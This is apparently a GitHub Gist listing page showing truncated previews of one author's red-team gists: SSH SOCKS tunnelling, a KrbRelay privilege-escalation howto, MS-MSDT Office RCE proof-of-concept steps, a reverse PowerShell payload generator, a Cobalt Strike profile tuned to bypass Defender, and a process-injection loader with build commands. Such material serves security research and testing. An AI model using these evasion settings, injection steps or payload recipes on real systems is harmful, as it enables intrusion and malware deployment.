Skip to content

Instantly share code, notes, and snippets.

@tothi
tothi / tunnel_vm_socks.txt
Last active October 14, 2024 15:43
tunnel virtualbox through socks (using poor man's vpn = ssh socks tunnel)
# ssh socks server on :5000 (tunnels traffic to tunnel-endpoint-server)
ssh -D5000 -NT -v user@tunnel-endpoint-server
# redsocks: https://github.com/darkk/redsocks
# 1.) as a socks client, listen on :4999 and connect to :5000
# 2.) run a dummy udp dns server on :5300 (to force vm to fallback to tcp which is working through ssh socks)
cat > redsocks.conf <<EOF
base { log_info=on; redirector=iptables; }
redsocks { local_ip=127.0.0.1; local_port=4999; ip=127.0.0.1; port=5000; type=socks4; }
dnstc { local_ip=127.0.0.1; local_port=5300; }
@tothi
tothi / krbrelay_privesc_howto.md
Last active October 14, 2024 00:58
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@tothi
tothi / ms-msdt.MD
Last active September 29, 2024 08:10
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@tothi
tothi / magisk_ramdisk_patch_avd.sh
Last active September 14, 2024 21:17
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
#!/bin/bash
#
# patch ramdisk.img (for installing Magisk on x64 Android emulator)
#
# x86_64 on Android 12 (API Level 32) is supported/tested currently
#
# install AVD:
#
# sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64'
@tothi
tothi / nmap-http-url.py
Last active September 9, 2024 17:39
Generate HTTP URLs from Nmap XML (and optionally use VirtualHosts)
#!/usr/bin/env python3
#
# inputs: nmap.xml (nmap scan xml output), subdomains.csv (optional virtualhost info, hostname + ip address csv file)
# output: url listing (useful for tools like EyeWitness)
#
# sample usage: ./nmap-http-url.py nmap.xml subdomains.csv | sort -u | gowitness file -f -
#
description = '''
Generate HTTP URLs from Nmap XML (and optionally additional VirtualHost listing, taken from e.g. subdomain enumeration).
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@tothi
tothi / git_cheatsheet.txt
Last active August 15, 2024 20:26
git cheatsheet for basic things
# git cheatsheet: some basic git instructions (w.i.p.)
# create bare repo for an existing source tree
git init --bare project.git
cd project.git
# edit exclude
edit info/exclude
# add files to bare repo
@tothi
tothi / android_burp.txt
Last active August 15, 2024 20:24
android emulator setup with sniffer CA
OBSOLETE: moved to Magisk + Magisk Trust User Certs module.
Emulator setup with Magisk: https://gist.github.com/tothi/1a206791c8b77d7e42015183c980657e
Magisk Trust User Certs module: https://github.com/NVISOsecurity/MagiskTrustUserCerts
android emulator clean install + prepare for https proxy analysis
=================================================================
# clean up old packages
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2024 20:16
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@tothi
tothi / DInjectQueuerAPC.cs
Last active August 15, 2024 20:00 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;